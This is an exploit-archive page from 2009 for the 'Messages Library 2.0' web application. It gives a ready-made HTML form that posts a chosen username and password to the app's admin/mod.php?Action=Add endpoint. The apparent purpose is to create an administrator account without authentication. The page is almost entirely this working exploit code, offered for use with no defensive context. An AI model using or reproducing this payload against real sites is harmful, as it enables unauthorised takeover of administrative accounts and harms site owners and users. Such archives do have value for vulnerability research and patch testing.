[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Messages Library 2.0 Arbitrary Administrator Account Vulnerability
# Published : 2009-06-30
# Author : ThE g0bL!N
# Previous Title : PunBB Extension Vote For Us <= 1.0.1 Blind SQL Injection Exploit
# Next Title : WHOISCART (Auth Bypass) Information Disclosure Vulnerability


<head>
<title>ThE g0bL!N  Messages Library 2.0 Remote Add Admintsrator Account </title>
<base target="left">
<link rel="stylesheet" href="style.css">
</head>
<form method="POST" action="http://path/sms/admin/mod.php?Action=Add">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Username</font></td>
      <td width="75%">&nbsp;<input type="text" name="Name" size="57"></td>
    </tr>
    <tr>
      <td width="25%"><font face="MS Sans Serif" size="2">Password</font></td>
      <td width="75%">&nbsp;<input type="password" name="Password" size="57"></td>
    </tr>
  </table>
  <p align="center"><input type="submit" value="add admin" name="B1"></p>
</form>
</body>
</html>

# www.Syue.com [2009-06-30]